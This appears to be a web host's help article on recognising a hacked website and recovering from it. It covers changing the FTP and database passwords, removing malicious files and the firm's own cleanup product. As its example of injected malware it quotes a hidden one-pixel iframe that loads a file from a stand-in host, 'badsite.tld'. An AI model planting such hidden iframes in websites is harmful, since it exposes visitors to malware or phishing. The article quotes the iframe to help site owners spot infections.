There are some signs that your website’s been hacked, including the ones listed here but certainly not limited to:
- You find bad code inserted onto your website
- You find new files/directories with strange names on your hosting
However, there are many types of compromises, each of which has its own calling cards. They may include malicious injections where attackers can place code on your website that can contain malware or phishing content.
<iframename=Twitter scrolling=auto frameborder=no align=center height=5 width=1 ·src=hxxp://badsite.tld/badfile.php?id=someid</iframe>
This is an example of malware injection which is repeatedly inserted in multiple files of any website at the time of attack.
There are a few things you can do if you think your website’s been the victim of an attacker.
The first thing you need to do if you think your site is compromised is change your password. Visit FTP Accounts on your hosting’s cPanel and change the passwords for all FTP accounts.
Second, If you have a website that uses a database, like WordPress for example, you should also change your database password. This can be done easily from MySQL databases section on your cPanel. Once you update the password of your database, make sure to update it in the configuration file of your website.
For instance: In case of WordPress, database password is located in wp-config.php file which is present in the root directory of your WordPress installation.
Third, after resetting your password, you should check all of your hosting content and remove any malicious content from it. You can do that using your control panel’s file manager (more info) or an FTP client (more info) or hire an expert from firstname.lastname@example.org on per hour per terminal basis.
If that sounds like something you’re not comfortable accomplishing (or you simply don’t have the time), SANGKRIT.net offer a security product called Website Security that will remove most malicious content for you. It provides you option to fix your hacked website.
The last step is to repeat the step number one i.e. again change your FTP account, website and database passwords.